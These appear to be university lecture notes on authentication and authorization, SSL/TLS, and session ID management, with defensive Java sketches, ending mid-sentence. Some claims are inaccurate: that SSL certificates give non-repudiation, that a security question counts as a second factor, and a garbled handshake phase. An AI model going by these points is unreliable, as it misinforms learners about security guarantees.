
Unit-1

AUTHENTICATION AND AUTHORIZATION


Authentication and authorization are two terms commonly used in the security
world. They might sound similar but are completely different from each other.
Authentication verifies someone's identity, whereas authorization grants
someone permission to access a particular resource. These are two basic
security terms and hence need to be understood thoroughly. In this topic, we
will discuss what authentication and authorization are and how they differ from
each other.

What is Authentication?
o Authentication is the process of verifying someone's identity, i.e.,
confirming that the person is who they claim to be.
o Both the server and the client use it. The server uses authentication when
someone wants to access its information and it needs to know who is
accessing that information. The client uses it when it wants to confirm that
the server is the one it claims to be.
o Authentication by the server is mostly done using a username and
password. It can also be done using cards, retina scans, voice recognition,
and fingerprints.
o Authentication does not determine what tasks a person can perform or what
files they can view, read, or update. It only establishes who the person or
system actually is.

Authentication Factors

Depending on the security level and the type of application, there are different
types of authentication factors:
o Single-Factor Authentication
Single-factor authentication is the simplest form of authentication. It only
needs a username and password to allow a user to access a system.
o Two-Factor Authentication
As the name suggests, this is two-level security; hence it needs two-step
verification to authenticate a user. It requires not only a username and
password but also a piece of information that only the particular user
knows, such as a first school name or a favorite destination. Apart from
this, it can also verify the user by sending an OTP or a unique link to the
user's registered phone number or email address.
o Multi-Factor Authentication
This is the most secure and advanced level of authentication. It requires
two or more levels of security from different and independent categories.
This type of authentication is usually used in financial organizations,
banks, and law enforcement agencies, and helps eliminate data exposure to
third parties or hackers.

Famous Authentication techniques

1. Password-based authentication

It is the simplest way of authentication. It requires the password for the
particular username. If the password matches the username and both details
match the system's database, the user is successfully authenticated.

2. Passwordless authentication

In this technique, the user doesn't need any password; instead, they receive an
OTP (one-time password) or a link on their registered mobile number or email
address. It is also called OTP-based authentication.

3. 2FA/MFA

2FA/MFA, or 2-factor authentication/multi-factor authentication, is a higher
level of authentication. It requires an additional PIN or security questions to
authenticate the user.

4. Single Sign-on

Single Sign-on, or SSO, is a way to enable access to multiple applications with a
single set of credentials. It allows the user to sign in once and be automatically
signed in to all other web apps from the same centralized directory.

5. Social Authentication

Social authentication does not require additional security; instead, it verifies the
user with existing credentials from an available social network.

What is Authorization?
o Authorization is the process of granting someone permission to do
something. In other words, it is a way to check whether the user has
permission to use a resource or not.
o It defines what data and information a user can access. It is also referred to
as AuthZ.
o Authorization usually works together with authentication so that the system
knows who is accessing the information.
o Authorization is not always necessary to access information available over
the internet. Some data available over the internet, such as public articles,
can be accessed without any authorization.

Authorization Techniques
o Role-based access control
With RBAC, or role-based access control, access is granted to users
according to their role or profile in the organization. It can be implemented
for system-to-system or user-to-system access.
o JSON web token
A JSON web token, or JWT, is an open standard used to securely transmit
data between parties in the form of a JSON object. The users are verified
and authorized using a private/public key pair (see the sketch after this
list).
o SAML
SAML stands for Security Assertion Markup Language. It is an open
standard that provides authorization credentials to service providers. These
credentials are exchanged through digitally signed XML documents.
o OpenID authorization
It helps clients verify the identity of end users on the basis of
authentication performed by an identity provider.
o OAuth
OAuth is an authorization protocol that enables an application or API to
access the requested resources.
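
To make the JWT idea above concrete, here is a minimal sketch (using only the JDK, no JWT library) that verifies the signature of an HMAC-signed (HS256) compact token. The token string and secret are placeholders; as noted above, many deployments instead sign tokens with an RSA or EC private/public key pair, and production code should use a vetted JWT library that also validates the header and claims such as expiry.

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Base64;

public class JwtVerifySketch {
    // Verifies the signature of a compact JWT ("header.payload.signature") signed with HS256.
    static boolean verifyHs256(String jwt, byte[] secret) throws Exception {
        String[] parts = jwt.split("\\.");
        if (parts.length != 3) return false;

        // Recompute the HMAC-SHA256 over "header.payload" with the shared secret.
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(secret, "HmacSHA256"));
        byte[] expected = mac.doFinal((parts[0] + "." + parts[1]).getBytes(StandardCharsets.US_ASCII));

        // Compare against the transmitted signature using a constant-time comparison.
        byte[] provided = Base64.getUrlDecoder().decode(parts[2]);
        return MessageDigest.isEqual(expected, provided);
    }

    public static void main(String[] args) throws Exception {
        String token = "...";                                           // placeholder: a real compact JWT goes here
        byte[] secret = "change-me".getBytes(StandardCharsets.UTF_8);   // placeholder shared secret
        if (verifyHs256(token, secret)) {
            // Only after the signature checks out should the payload claims be trusted.
            String payloadJson = new String(
                Base64.getUrlDecoder().decode(token.split("\\.")[1]), StandardCharsets.UTF_8);
            System.out.println("Verified claims: " + payloadJson);
        } else {
            System.out.println("Token rejected");
        }
    }
}
```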

Difference chart between Authentication and Authorization

Authentication | Authorization

Authentication is the process of identifying a user to provide access to a
system. | Authorization is the process of giving the user permission to access
resources.

In this, the user or client and the server are verified. | In this, it is verified
whether the user is allowed access according to the defined policies and rules.

It is usually performed before authorization. | It is usually done once the user
has been successfully authenticated.

It requires the user's login details, such as username and password. | It requires
the user's privilege or security level.

Data is provided through token IDs. | Data is provided through access tokens.

Example: Entering login details is necessary for employees to authenticate
themselves before accessing organizational email or software. | Example: After
employees successfully authenticate themselves, they can access and work only
on certain functions, as per their roles and profiles.

The user can partially change authentication credentials as per their
requirements. | The user cannot change authorization permissions. Permissions
are given to a user by the owner/manager of the system, and only the
owner/manager can change them.

Conclusion

As per the above discussion, we can say that authentication verifies the user's
identity, while authorization verifies the user's access rights and permissions. If
users cannot prove their identity, they cannot access the system. And if a user is
authenticated by proving the correct identity but is not authorized to perform a
specific function, they will not be able to access it. However, both security
methods are often used together.

SECURE SOCKET LAYER (SSL)




Secure Socket Layer (SSL) provides security to the data that is transferred
between web browser and server. SSL encrypts the link between a web server
and a browser which ensures that all data passed between them remain private
and free from attack.
Secure Socket Layer Protocols:
• SSL record protocol
• Handshake protocol
• Change-cipher spec protocol
• Alert protocol
SSL Protocol Stack: (diagram omitted; the handshake, change-cipher spec, and
alert protocols sit on top of the SSL record protocol, which runs over TCP)
SSL Record Protocol:
SSL Record provides two services to SSL connection.
• Confidentiality
• Message Integrity
In the SSL Record Protocol, application data is divided into fragments. Each
fragment is compressed, and then a MAC (Message Authentication Code),
generated by algorithms such as SHA (Secure Hash Algorithm) or MD5
(Message Digest), is appended. After that, the data is encrypted, and finally the
SSL header is appended to the data.
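
The following sketch mirrors the order of operations described above (fragment, MAC, encrypt, prepend header) in plain Java, purely to make the pipeline easier to follow. It is an illustration under simplifying assumptions, not the real SSL record format: actual implementations include sequence numbers, padding rules, and exact header fields, and modern TLS uses AEAD ciphers rather than this MAC-then-encrypt layout.

```java
import javax.crypto.Cipher;
import javax.crypto.Mac;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;

public class RecordProtocolSketch {
    public static void main(String[] args) throws Exception {
        byte[] applicationData = "example application data".getBytes(StandardCharsets.UTF_8);

        // Illustrative keys only; a real session derives these from the handshake.
        byte[] macKey = new byte[32];
        byte[] encKey = new byte[16];
        byte[] iv = new byte[16];
        SecureRandom rng = new SecureRandom();
        rng.nextBytes(macKey);
        rng.nextBytes(encKey);
        rng.nextBytes(iv);

        // 1. Fragmentation (and optionally compression) would happen here; we keep one fragment.
        byte[] fragment = applicationData;

        // 2. Append a MAC computed over the fragment.
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(macKey, "HmacSHA256"));
        byte[] tag = mac.doFinal(fragment);
        byte[] fragmentPlusMac = ByteBuffer.allocate(fragment.length + tag.length)
                .put(fragment).put(tag).array();

        // 3. Encrypt fragment + MAC.
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(encKey, "AES"), new IvParameterSpec(iv));
        byte[] ciphertext = cipher.doFinal(fragmentPlusMac);

        // 4. Prepend a (simplified) record header: content type, version, length.
        ByteBuffer record = ByteBuffer.allocate(5 + ciphertext.length);
        record.put((byte) 23).put((byte) 3).put((byte) 3)
              .putShort((short) ciphertext.length).put(ciphertext);

        System.out.println("Record length including header: " + record.capacity() + " bytes");
    }
}
```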

Handshake Protocol:
Handshake Protocol is used to establish sessions. This protocol allows the client
and server to authenticate each other by sending a series of messages to each
other. Handshake protocol uses four phases to complete its cycle.
• Phase-1: In Phase-1, both client and server send hello packets to each
other. In this phase, the IP session, cipher suite, and protocol version are
exchanged for security purposes.
• Phase-2: The server sends its certificate and Server-key-exchange. The
server ends Phase-2 by sending the Server-hello-done packet.
• Phase-3: In this phase, the client replies to the server by sending its
certificate and Client-key-exchange.
• Phase-4: In Phase-4, the Change-cipher suite exchange occurs, after which
the handshake protocol ends.
(Diagram: SSL handshake protocol phases)

Change-cipher Protocol:
This protocol uses the SSL record protocol. Until the handshake protocol is
completed, the SSL record output remains in a pending state; after the
handshake protocol completes, the pending state is converted into the current
state. The change-cipher protocol consists of a single message, which is 1 byte
in length and can have only one value. Its purpose is to cause the pending state
to be copied into the current state.

Alert Protocol:
This protocol is used to convey SSL-related alerts to the peer entity. Each
message in this protocol contains 2 bytes: the first byte indicates the severity
level (warning or fatal) and the second byte describes the specific alert.

The level is further classified into two parts:


Warning (level = 1):
This Alert has no impact on the connection between sender and receiver. Some
of them are:
Bad certificate: When the received certificate is corrupt.
No certificate: When an appropriate certificate is not available.
Certificate expired: When a certificate has expired.
Certificate unknown: When some other unspecified issue arose in processing
the certificate, rendering it unacceptable.
Close notify: It notifies that the sender will no longer send any messages in the
connection.
Unsupported certificate: The type of certificate received is not supported.
Certificate revoked: The received certificate is in the revocation list.

Fatal Error (level = 2):


This Alert breaks the connection between sender and receiver. The connection
will be stopped and cannot be resumed, but a new connection can be started. Some of them are:
Handshake failure: When the sender is unable to negotiate an acceptable set of
security parameters given the options available.
Decompression failure: When the decompression function receives improper
input.
Illegal parameters: When a field is out of range or inconsistent with other
fields.
Bad record MAC: When an incorrect MAC was received.
Unexpected message: When an inappropriate message is received.
The second byte in the Alert protocol describes the error.

Salient Features of Secure Socket Layer:


• The advantage of this approach is that the service can be tailored to
the specific needs of the given application.
• Netscape originated Secure Socket Layer.
• SSL is designed to make use of TCP to provide reliable end-to-end
secure service.
• This is a two-layered protocol.

Versions of SSL:
SSL 1 – Never released due to high insecurity.
SSL 2 – Released in 1995.
SSL 3 – Released in 1996.
TLS 1.0 – Released in 1999.
TLS 1.1 – Released in 2006.
TLS 1.2 – Released in 2008.
TLS 1.3 – Released in 2018.
SSL (Secure Sockets Layer) certificate is a digital certificate used to secure and
verify the identity of a website or an online service. The certificate is issued by
a trusted third-party called a Certificate Authority (CA), who verifies the
identity of the website or service before issuing the certificate.
The SSL certificate has several important characteristics that make it a reliable
solution for securing online transactions:
1. Encryption: The SSL certificate uses encryption algorithms to secure
the communication between the website or service and its users. This
ensures that the sensitive information, such as login credentials and
credit card information, is protected from being intercepted and read
by unauthorized parties.
2. Authentication: The SSL certificate verifies the identity of the
website or service, ensuring that users are communicating with the
intended party and not with an impostor. This provides assurance to
users that their information is being transmitted to a trusted entity.
3. Integrity: The SSL certificate uses message authentication codes
(MACs) to detect any tampering with the data during transmission.
This ensures that the data being transmitted is not modified in any
way, preserving its integrity.
4. Non-repudiation: SSL certificates provide non-repudiation of data,
meaning that the recipient of the data cannot deny having received it.
This is important in situations where the authenticity of the
information needs to be established, such as in e-commerce
transactions.
5. Public-key cryptography: SSL certificates use public-key
cryptography for secure key exchange between the client and server.
This allows the client and server to securely exchange encryption
keys, ensuring that the intended recipient can only decrypt the
encrypted information.
6. Session management: SSL certificates allow for the management of
secure sessions, allowing for the resumption of secure sessions after
interruption. This helps to reduce the overhead of establishing a new
secure connection each time a user accesses a website or service.
7. Certificates issued by trusted CAs: SSL certificates are issued by
trusted CAs, who are responsible for verifying the identity of the
website or service before issuing the certificate. This provides a high
level of trust and assurance to users that the website or service they are
communicating with is authentic and trustworthy.
In addition to these key characteristics, SSL certificates also come in
various levels of validation, including Domain Validation (DV), Organization
Validation (OV), and Extended Validation (EV). The level of validation
determines the amount of information that is verified by the CA before issuing
the certificate, with EV certificates providing the highest level of assurance and
trust to users.

TRANSPORT LAYER SECURITY

What is Transport Layer Security?


Transport Layer Security (TLS) is an Internet Engineering Task Force (IETF)
standard protocol that provides authentication, privacy and data integrity
between two communicating computer applications. It's the most widely
deployed security protocol in use today and is best suited for web browsers and
other applications that require data to be securely exchanged over a network.
This includes web browsing sessions, file transfers, virtual private network
(VPN) connections, remote desktop sessions and voice over IP (VoIP). More
recently, TLS is being integrated into modern cellular transport technologies,
including 5G, to protect core network functions throughout the radio access
network (RAN).

How does Transport Layer Security work?


TLS uses a client-server handshake mechanism to establish an encrypted and
secure connection and to ensure the authenticity of the communication. Here's a
breakdown of the process:

1. Communicating devices exchange encryption capabilities.


2. An authentication process occurs using digital certificates to help
prove the server is the entity it claims to be.
3. A session key exchange occurs. During this process, clients and
servers must agree on a key to establish the fact that the secure session
is indeed between the client and server -- and not something in the
middle attempting to hijack the conversation.
How TLS handshake works

TLS uses a public key exchange process to establish a shared secret between the
communicating devices. The two handshake methods are the Rivest-Shamir-
Adleman (RSA) handshake and the Diffie-Hellman handshake. Both methods
result in the same goal of establishing a shared secret between communicating
devices so the communication can't be hijacked. Once the keys are exchanged,
data transmissions between devices on the encrypted session can begin.
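
As a concrete illustration of the handshake, the sketch below opens a TLS connection from Java. The hello exchange, certificate-based server authentication, and key agreement all happen inside startHandshake(), using the JVM's default trust store; example.com is just an example host.

```java
import javax.net.ssl.SSLSession;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

public class TlsClientSketch {
    public static void main(String[] args) throws Exception {
        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();

        // Example host; any HTTPS endpoint reachable from this machine would do.
        try (SSLSocket socket = (SSLSocket) factory.createSocket("example.com", 443)) {
            // Triggers the TLS handshake: hello messages, certificate verification, key exchange.
            socket.startHandshake();

            SSLSession session = socket.getSession();
            System.out.println("Protocol:       " + session.getProtocol());      // e.g. TLSv1.3
            System.out.println("Cipher suite:   " + session.getCipherSuite());
            System.out.println("Peer principal: " + session.getPeerPrincipal());
        }
    }
}
```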

History and development of TLS


TLS evolved from Netscape Communications Corp.'s Secure Sockets Layer
protocol and has largely superseded it, although the terms SSL or SSL/TLS are
still sometimes used interchangeably. The IETF officially took over the SSL
protocol to standardize it with an open process and released version 3.1 of SSL
in 1999 as TLS 1.0. The protocol was renamed TLS to avoid legal issues with
Netscape, which developed the SSL protocol as a key part of its original web
browser. According to the protocol specification, TLS is composed of two
layers: the TLS record protocol and the TLS handshake protocol. The record
protocol provides connection security, while the handshake protocol enables the
server and client to authenticate each other and to negotiate
encryption algorithms and cryptographic keys before any data is exchanged.

The most recent version of TLS, 1.3, was officially finalized by IETF in 2018.
The primary benefit over previous versions of the protocol is added encryption
mechanisms when establishing a connection handshake between a client and
server. While earlier TLS versions offer encryption as well, TLS 1.3 manages to
establish an encrypted session earlier in the handshake process. Additionally,
the number of steps required to complete a handshake is reduced, substantially
lowering the amount of time it takes to complete a handshake and begin
transmitting or receiving data between the client and server.

Another enhancement of TLS 1.3 is that several cryptographic algorithms used
to encrypt data were removed, as they were deemed obsolete and weren't
recommended for secure transport. Additionally, some security features that
were once optional are now required. For example, message-digest algorithm 5
(MD5) cryptographic hashes are no longer supported, perfect forward secrecy
(PFS) is required and Rivest Cipher 4 (RC4) negotiation is prohibited. This
eliminates the chance that a TLS-encrypted session uses a known insecure
encryption algorithm or method in TLS version 1.3.

The benefits of Transport Layer Security


The benefits of TLS are straightforward when discussing using versus not using
TLS. As noted above, a TLS-encrypted session provides a secure authentication
mechanism, data encryption and data integrity checks. However, when
comparing TLS to another secure authentication and encryption protocol suite,
such as Internet Protocol Security, TLS offers added benefits and is a reason
why IPsec is being replaced with TLS in many enterprise deployment situations.
These include benefits such as the following:

• Security is built directly into each application, as opposed to relying on
external software or hardware to build IPsec tunnels.
• There is true end-to-end encryption (E2EE) between communicating
devices.
• There is granular control over what can be transmitted or received on
an encrypted session.
• Since TLS operates within the upper layers of the Open Systems
Interconnection (OSI) model, it doesn't have the network address
translation (NAT) complications that are inherent with IPsec.
• TLS offers logging and auditing functions that are built directly into
the protocol.
The challenges of TLS
There are a few drawbacks when it comes to either not using secure
authentication or any encryption -- or when deciding between TLS and other
security protocols, such as IPsec. Here are a few examples:

• Because TLS operates at Layers 4 through 7 of the OSI model, as
opposed to Layer 3, which is the case with IPsec, each application and
each communication flow between client and server must establish its
own TLS session to gain authentication and data encryption benefits.
• The ability to use TLS depends on whether each application supports
it.
• Since TLS is implemented on an application-by-application basis to
achieve improved granularity and control over encrypted sessions, it
comes at the cost of increased management overhead.
• Now that TLS is gaining in popularity, threat actors are more focused
on discovering and exploiting potential TLS exploits that can be used
to compromise data security and integrity.
Differences between TLS and SSL
As mentioned previously, SSL is the precursor to TLS. Thus, most of the
differences between the two are evolutionary in nature, as the protocol adjusts
to address vulnerabilities and to improve implementation and integration
capabilities.

Key differences between SSL and TLS that make TLS a more secure and
efficient protocol are message authentication, key material generation and the
supported cipher suites, with TLS supporting newer and more
secure algorithms. TLS and SSL are not interoperable, though TLS currently
provides some backward compatibility in order to work with legacy systems.
Additionally, TLS -- especially later versions -- completes the handshake
process much faster compared to SSL. Thus, lower communication latency from
an end-user perspective is noticeable.

Attacks against TLS/SSL


Implementation flaws have always been a big problem with encryption
technologies, and TLS is no exception. Even though TLS/SSL communications
are considered highly secure, there have been instances where vulnerabilities
were discovered and exploited. But keep in mind that the examples mentioned
below were vulnerabilities in TLS version 1.2 and earlier. All known
vulnerabilities against prior versions of TLS, such as Browser Exploit Against
SSL/TLS (BEAST), Compression Ratio Info-leak Made Easy (CRIME) and
protocol downgrade attacks, have been eliminated through TLS version updates.
Examples of significant attacks or incidents include the following:

• The infamous Heartbleed bug was the result of a surprisingly small
vulnerability discovered in a piece of cryptographic logic that relates to
OpenSSL's implementation of the TLS heartbeat mechanism, which is
designed to keep connections alive even when no data is being
transmitted.
• Although TLS isn't vulnerable to the POODLE attack because it
specifies that all padding bytes must have the same value and be
verified, a variant of the attack has exploited certain implementations
of the TLS protocol that don't correctly validate encryption padding
byte requirements.
• The BEAST attack was discovered in 2011 and affected version 1.0 of
TLS. The attack focused on a vulnerability discovered in the
protocol's cipher block chaining (CBC) mechanism. This enabled an
attacker to capture and decrypt data being sent and received across the
"secure" communications channel.
• An optional data compression feature found within TLS led to the
vulnerability known as CRIME. This vulnerability can decrypt
communication session cookies using brute-force methods. Once
compromised, attackers can insert themselves into the encrypted
conversation.
• The Browser Reconnaissance and Exfiltration via Adaptive
Compression of Hypertext (BREACH) vulnerability also uses
compression as its exploit target, like CRIME. However, the
difference between BREACH and CRIME is the fact that BREACH
compromises Hypertext Transfer Protocol (HTTP) compression, as
opposed to TLS compression. But, even if TLS compression isn't
enabled, BREACH can still compromise the session.

The following sections explain how Transport Layer Security (TLS) secures
web applications, using a conversation between friends as a relatable analogy.
TLS as a Secure Conversation
Imagine you and your friend want to have a private conversation, but you're
sitting in a crowded park where anyone could potentially overhear you. TLS
acts like a series of steps and tools you use to ensure that only you and your
friend can understand each other, making your conversation secure from
eavesdroppers and tampering.
Encryption: Scrambling the Conversation
Analogy:
When you talk to your friend, you both use a special code that scrambles your
words in a way that only the two of you can understand. Even if someone else
hears the conversation, they can't make sense of it because they don't know the
code.
Technical Detail:
- Symmetric Encryption: Once the TLS connection is established, both your
web browser (the client) and the website (the server) use the same secret key to
encrypt and decrypt data. This ensures that the data remains confidential and
can only be understood by the intended parties.
- Asymmetric Encryption: Initially, when setting up the connection, the client
and server use a pair of public and private keys to exchange the symmetric key
securely. This process ensures that even if someone intercepts the key
exchange, they cannot decrypt the data without the private key.
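
A minimal sketch of this asymmetric-then-symmetric idea: the client generates a fresh AES session key and sends it to the server encrypted under the server's RSA public key. This mirrors the classic RSA key-transport style of handshake; modern TLS 1.3 instead derives the shared secret with (EC)Diffie-Hellman, so treat this purely as an illustration of the concept.

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.SecretKeySpec;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.util.Arrays;

public class KeyExchangeSketch {
    public static void main(String[] args) throws Exception {
        // Server side: an RSA key pair; the public key is what the certificate carries.
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        KeyPair serverKeys = kpg.generateKeyPair();

        // Client side: pick a fresh symmetric (AES) session key ...
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128);
        SecretKey sessionKey = kg.generateKey();

        // ... and send it encrypted under the server's public key.
        Cipher rsa = Cipher.getInstance("RSA/ECB/OAEPWithSHA-256AndMGF1Padding");
        rsa.init(Cipher.ENCRYPT_MODE, serverKeys.getPublic());
        byte[] wrapped = rsa.doFinal(sessionKey.getEncoded());

        // Server side: recover the same session key with its private key.
        rsa.init(Cipher.DECRYPT_MODE, serverKeys.getPrivate());
        SecretKey recovered = new SecretKeySpec(rsa.doFinal(wrapped), "AES");

        System.out.println("Keys match: "
                + Arrays.equals(sessionKey.getEncoded(), recovered.getEncoded()));
    }
}
```
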
Authentication: Verifying Your Friend's Identity
Analogy:
Before you start sharing secrets, you check your friend's ID to make sure it's
really them and not someone pretending to be your friend.

Technical Detail:
- Digital Certificates: The website presents a digital certificate, which is like an
ID card issued by a trusted authority (Certificate Authority or CA). This
certificate contains the website's public key and is digitally signed by the CA.
- Certificate Authorities (CAs): These trusted entities verify the identity of the
website before issuing a certificate, ensuring that the certificate holder is indeed
the legitimate owner of the domain.
- Trust Chain: Your browser trusts the CA, and therefore, it trusts the certificate
issued by the CA. If the certificate checks out, your browser can be confident
that it is communicating with the legitimate website.
Data Integrity: Ensuring the Message Stays Untouched
Analogy:
As you whisper a joke to your friend, you want to make sure no one can change
the punchline halfway. You both agree on a special way to check that the
message hasn't been altered during the exchange.
Technical Detail:
- Message Authentication Codes (MACs): Every message sent between the
client and server includes a MAC, which is a cryptographic hash of the message
content combined with a secret key. This hash acts like a fingerprint for the
message.
- Integrity Check: When the message is received, the recipient recalculates the
MAC and compares it to the one sent with the message. If they match, it
confirms that the message hasn't been tampered with. If they don't match, it
indicates that the message has been altered, and the recipient can reject it.
How TLS Secures Web Applications

Example: Online Shopping:


When you visit an online store and enter your credit card information, TLS
ensures that:
1. Encryption: Your credit card details are scrambled into an unreadable format
as they travel from your browser to the website's server.
2. Authentication: Your browser verifies that it is indeed communicating with
the legitimate online store and not an imposter site.
3. Data Integrity: The details you entered are delivered exactly as you entered
them, without any alterations.
Building Trust with Users

TLS helps build trust between users and web applications by providing:
- Confidentiality: Users can be assured that their sensitive information, such as
login credentials, personal details, and payment information, is protected from
eavesdroppers.
- Authentication: Users can verify that they are interacting with legitimate
websites, protecting them from phishing attacks and fraudulent websites.
- Integrity: Users can trust that the data they send and receive has not been
tampered with during transmission.
Conclusion
Transport Layer Security (TLS) is like a comprehensive toolkit for securing
online communications. By encrypting data, verifying the identities of websites,
and ensuring data integrity, TLS protects users' sensitive information and fosters
a secure and trustworthy online environment. In our increasingly digital world,
TLS is indispensable for maintaining the privacy and security of web
applications, especially when dealing with sensitive transactions and personal
data.

Introduction
Web Authentication, Session Management, and Access Control:

A web session is a sequence of network HTTP request and response
transactions associated with the same user. Modern and complex web
applications require the retaining of information or status about each user for the
duration of multiple requests. Therefore, sessions provide the ability to establish
variables – such as access rights and localization settings – which will apply to
each and every interaction a user has with the web application for the duration
of the session.

Web applications can create sessions to keep track of anonymous users after the
very first user request. An example would be maintaining the user language
preference. Additionally, web applications will make use of sessions once the
user has authenticated. This ensures the ability to identify the user on any
subsequent requests as well as being able to apply security access controls,
authorized access to the user private data, and to increase the usability of the
application. Therefore, current web applications can provide session capabilities
both pre and post authentication.

Once an authenticated session has been established, the session ID (or token) is
temporarily equivalent to the strongest authentication method used by the
application, such as username and password, passphrases, one-time passwords
(OTP), client-based digital certificates, smartcards, or biometrics (such as
fingerprint or eye retina).

HTTP is a stateless protocol, where each request and response pair are
independent of other web interactions. Therefore, in order to introduce the
concept of a session, it is required to implement session management
capabilities that link both the authentication and access control (or
authorization) modules commonly available in web applications:

The session ID or token binds the user authentication credentials (in the form of
a user session) to the user HTTP traffic and the appropriate access controls
enforced by the web application. The complexity of these three components
(authentication, session management, and access control) in modern web
applications, plus the fact that their implementation and binding reside in the web
developer's hands (as web development frameworks do not provide strict
relationships between these modules), makes the implementation of a secure
session management module incredibly challenging.

The disclosure, capture, prediction, brute force, or fixation of the session ID will
lead to session hijacking (or side jacking) attacks, where an attacker is able to
fully impersonate a victim user in the web application. Attackers can perform
two types of session hijacking attacks, targeted or generic. In a targeted attack,
the attacker's goal is to impersonate a specific (or privileged) web application
victim user. For generic attacks, the attacker's goal is to impersonate (or get
access as) any valid or legitimate user in the web application.

Session ID Properties

In order to keep the authenticated state and track the user's progress within the
web application, applications provide users with a session identifier (session ID
or token) that is assigned at session creation time, and is shared and exchanged
by the user and the web application for the duration of the session (it is sent on
every HTTP request). The session ID is a name=value pair.

With the goal of implementing secure session IDs, the generation of identifiers
(IDs or tokens) must meet the following properties.

Session ID Name Fingerprinting

The name used by the session ID should not be extremely descriptive nor offer
unnecessary details about the purpose and meaning of the ID.

The session ID names used by the most common web application development
frameworks can be easily fingerprinted, such
as PHPSESSID (PHP), JSESSIONID (J2EE), CFID & CFTOKEN (ColdFusion
), ASP.NET_SessionId (ASP .NET), etc. Therefore, the session ID name can
disclose the technologies and programming languages used by the web
application.

It is recommended to change the default session ID name of the web
development framework to a generic name, such as id.

Session ID Length

The session ID must be long enough to prevent brute force attacks, where an
attacker can go through the whole range of ID values and verify the existence of
valid sessions.
The session ID length must be at least 128 bits (16 bytes).

NOTE:

• The session ID length of 128 bits is provided as a reference based on
the assumptions made in the next section, Session ID Entropy.
However, this number should not be considered as an absolute
minimum value, as other implementation factors might influence its
strength.
• For example, there are well-known implementations, such
as Microsoft ASP.NET session IDs: "The ASP .NET session identifier
is a randomly generated number encoded into a 24-character string
consisting of lowercase characters from a to z and numbers from 0 to
5".
• It can provide an exceptionally good effective entropy, and as a
result, can be considered long enough to avoid guessing or brute force
attacks.

Session ID Entropy

The session ID must be unpredictable (random enough) to prevent guessing
attacks, where an attacker is able to guess or predict the ID of a valid session
through statistical analysis techniques. For this purpose, a
good CSPRNG (Cryptographically Secure Pseudorandom Number Generator)
must be used.

The session ID value must provide at least 64 bits of entropy (if a
good PRNG is used, this value is estimated to be half the length of the session
ID).

Additionally, a random session ID is not enough; it must also be unique to avoid
duplicated IDs. A random session ID must not already exist in the current
session ID space.

NOTE:

• The session ID entropy is really affected by other external and
difficult-to-measure factors, such as the number of concurrent active
sessions the web application commonly has, the absolute session
expiration timeout, the amount of session ID guesses per second the
attacker can make and the target web application can support, etc.
• If a session ID with an entropy of 64 bits is used, an attacker can
expect to spend more than 292 years to successfully guess a valid
session ID, assuming the attacker can try 10,000 guesses per second
with 100,000 valid simultaneous sessions available in the web
application.
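
As a rough check on the 292-year figure (a back-of-the-envelope estimate, not an exact derivation): 64 bits of entropy give about 2^64 ≈ 1.8 × 10^19 possible IDs. With 100,000 valid sessions live at any moment, roughly 1 guess in 1.8 × 10^14 hits a valid ID. At 10,000 guesses per second the attacker makes about 3.2 × 10^11 guesses per year, so reaching a 50% chance of success takes roughly (0.5 × 1.8 × 10^14) / (3.2 × 10^11) ≈ 290 years, consistent with the estimate above.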

Session ID Content (or Value)

The session ID content (or value) must be meaningless to prevent information
disclosure attacks, where an attacker is able to decode the contents of the ID and
extract details of the user, the session, or the inner workings of the web
application.

The meaning and business or application logic associated with the session ID
must be stored on the server side, and specifically, in session objects or in a
session management database or repository.

The stored information can include the client IP address, User-Agent, e-mail,
username, user ID, role, privilege level, access rights, language preferences,
account ID, current state, last login, session timeouts, and other internal session
details. If the session objects and properties contain sensitive information, such
as credit card numbers, it is required to duly encrypt and protect the session
management repository.

It is recommended to use the session ID created by your language or
framework. If you need to create your own session ID, use a cryptographically
secure pseudorandom number generator (CSPRNG) with a size of at least 128
bits and ensure that each session ID is unique.
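
A minimal sketch of what such a generator can look like in Java (framework session managers already do the equivalent, so this is only for the rare case where you must mint your own IDs):

```java
import java.security.SecureRandom;
import java.util.Base64;

public class SessionIdSketch {
    private static final SecureRandom RNG = new SecureRandom(); // cryptographically secure PRNG

    // Returns a 128-bit (16-byte) random identifier, URL-safe Base64 encoded.
    static String newSessionId() {
        byte[] bytes = new byte[16];
        RNG.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    public static void main(String[] args) {
        // Uniqueness in a real system is enforced by checking the session store before use.
        System.out.println(newSessionId());
    }
}
```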

Session Management Implementation

The session management implementation defines the exchange mechanism that
will be used between the user and the web application to share and continuously
exchange the session ID. There are multiple mechanisms available in HTTP to
maintain session state within web applications, such as cookies (standard HTTP
header), URL parameters, URL arguments on GET requests, body arguments on
POST requests, such as hidden form fields (HTML forms), or proprietary HTTP
headers.

The preferred session ID exchange mechanism should allow defining advanced
token properties, such as the token expiration date and time, or granular usage
constraints. This is one of the reasons why cookies
(RFCs 2109 & 2965 & 6265) are one of the most extensively used session ID
exchange mechanisms, offering advanced capabilities not available in other
methods.

The usage of specific session ID exchange mechanisms, such as those where the
ID is included in the URL, might disclose the session ID (in web links and logs,
web browser history and bookmarks, the Referer header or search engines), as
well as facilitate other attacks, such as the manipulation of the ID or session
fixation attacks.

Built-in Session Management Implementations

Web development frameworks, such as J2EE, ASP .NET, PHP, and others,
provide their own session management features and associated implementation.
It is recommended to use these built-in frameworks versus building a home-
made one from scratch, as they are used worldwide on multiple web
environments and have been tested by the web application security and
development communities over time.

However, be advised that these frameworks have also presented vulnerabilities
and weaknesses in the past, so it is always recommended to use the latest
